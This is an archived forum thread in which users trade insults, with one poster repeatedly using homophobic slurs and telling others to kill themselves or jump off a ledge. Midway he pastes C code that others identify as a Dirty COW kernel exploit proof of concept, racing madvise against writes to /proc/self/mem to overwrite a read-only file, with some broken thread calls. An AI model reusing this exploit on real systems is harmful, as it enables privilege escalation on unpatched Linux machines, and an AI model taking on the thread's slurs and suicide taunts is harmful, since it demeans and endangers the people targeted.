Netcees

Netcees (http://netcees.org/index.php)
-   Discussion Board (http://netcees.org/forumdisplay.php?f=4)
-   -   Did bags die of aids yet? (http://netcees.org/showthread.php?t=141489)

Scripter 01-18-2020 10:42 AM

Quote:

Originally Posted by Sharp (Post 753870)
(citation needed)

"Did the guy that invented college go to college?"

Hopsin

Sharp 01-18-2020 12:33 PM

Ah, so you're a genius except in any demonstrable way

Scripter 01-18-2020 12:40 PM

Quote:

Originally Posted by Sharp (Post 753876)
Ah, so you're a genius except in any demonstrable way

Youre just the retard late for the party
Did we ask Jimbo what he thought yet?

Kill Spree 01-18-2020 01:11 PM

Quote:

Originally Posted by Scripter (Post 753877)
Youre just the retard late for the party
Did we ask Jimbo what he thought yet?

SHUT THE FUCK UP FAGGOT

~RustyGunZ~ 01-18-2020 01:27 PM

He went from master hacker to 16 yo cringe troll in a quick minute

Scripter 01-18-2020 01:46 PM

Quote:

Originally Posted by Kill Spree (Post 753879)
SHUT THE FUCK UP FAGGOT

Dude you keep talking homo

Scripter 01-18-2020 01:46 PM

Quote:

Originally Posted by Spleth (Post 753881)
He went from master hacker to 16 yo cringe troll in a quick minute

Oh yeah how is that mr im a fucking expert stupid ass fucker
You faggots are forever fantasying about who I am.

Bro why dont you tell me something I dont know faggot cmon...

what does nop mean?

Cmon homo youre so fucking elite

how bout cmp? that should be an easy one

dumb fag.....

how bout 00000100
what does it equal?

If you cant answer any of those questions you need to keep your brothers dick in your mouth.

And you hold yourself as some kind of brain lord. Yeah... sucking loads of cock...

Sharp 01-18-2020 02:08 PM

Scripter seems like the kind of guy to quit his job to focus on learning how to count binary on his hands full time

Scripter 01-18-2020 02:28 PM

Quote:

Originally Posted by Sharp (Post 753884)
Scripter seems like the kind of guy to quit his job to focus on learning how to count binary on his hands full time

Wow brilliant...
Did you think that up all by yourself?

Scripter 01-18-2020 02:33 PM

Quote:

Originally Posted by Spleth (Post 753881)
He went from master hacker to 16 yo cringe troll in a quick minute

Here is something you should be able to relate to moooo


Code:

#include <pthread.h>
#include <sys/stat.h>
#include <string.h>

void *map;
void *writeThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char *argv[])
{
  pthread_t pth1,pth2;
  struct stat st;
  int file_size;

  // Open the target file in the read-only mode.
  int f=open("/myfile", O_RDONLY);

  // Map the file to memory using MAP_PRIVATE.
  fstat(f, &st);
  file_size = st.st_size;
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);

  // Find the position of the target area
  char *position = strstr(map, "222222");                       

  // We have to do the attack using two threads.
  pthread_create(&pth1, NULL, madviseThread(file_size), (void  *)file_size);
  pthread_create(&pth2, NULL, writeThread(file_size), position);           

  // Wait for the threads to finish.
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}

void *writeThread(void *arg)
{
  char *content= "******";
  off_t offset = (off_t) arg;

  int f=open("/proc/self/mem", O_RDWR);
  while(1) {
    // Move the file pointer to the corresponding position.
    lseek(f, offset, SEEK_SET);
    // Write to the memory.
    write(f, content, strlen(content));
  }
}

void *madviseThread(void *arg)
{
  int file_size = (int) arg;
  while(1){
      madvise(map, file_size, MADV_DONTNEED);
  }
}


Sharp 01-18-2020 02:43 PM

Got me dude

Spree, Seth, and I talked for hours to come up with that one

Scripter 01-18-2020 02:48 PM

Quote:

Originally Posted by Sharp (Post 753891)
Got me dude

Spree, Seth, and I talked for hours to come up with that one

So a whole 3 brain cells was all it took amazing...
sharp lmao dull at best

Scripter 01-18-2020 03:13 PM

I swear to god these homos just dont know
I dont care
its odd that these dodos dont go
kill themselves
instead feel themselves
aren't fly and wont go
jump off a ledge
still in populus
homologous of a lemmings best
so hard ta guess
which is the dumbest dont know...

~RustyGunZ~ 01-18-2020 03:54 PM

Lol you would flex a dirty cow script

Fuckin script kiddie

Zuo 01-18-2020 04:59 PM

Quote:

Originally Posted by Scripter (Post 753892)
So a whole 3 brain cells was all it took amazing...
sharp lmao dull at best

What’s good ma boy?!!!!

I see you ballin in that avator jaja beast

Sharp 01-18-2020 06:20 PM

Quote:

Originally Posted by Scripter (Post 753892)
So a whole 3 brain cells was all it took amazing...
sharp lmao dull at best

Bruh

That wp is deadly

Have you signed up for 1-2?

Diode 01-18-2020 11:38 PM

This person is literally 11.

Dope girl 01-18-2020 11:44 PM

It's over
Thread closed

Scripter 01-19-2020 06:42 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753894)
Lol you would flex a dirty cow script

Fuckin script kiddie

Who was flexing retard... lmao
I was just giving you something you could relate tool... and obviously I was right tool lol
Yeah thats why my name is scripter youre my kiddies
Yall are nothing but a bunch of posers.
I bet it took you awhile to even figure out what it was lol

Scripter 01-19-2020 06:53 AM

Quote:

Originally Posted by Zuo (Post 753895)
What’s good ma boy?!!!!

I see you ballin in that avator jaja beast

Quote:

Originally Posted by Sharp (Post 753896)
Bruh

That wp is deadly

Have you signed up for 1-2?

lmao I know right an that was a quip, a five second response


All times are GMT -4. The time now is 05:02 AM.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
User Alert System provided by Advanced User Tagging (Lite) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.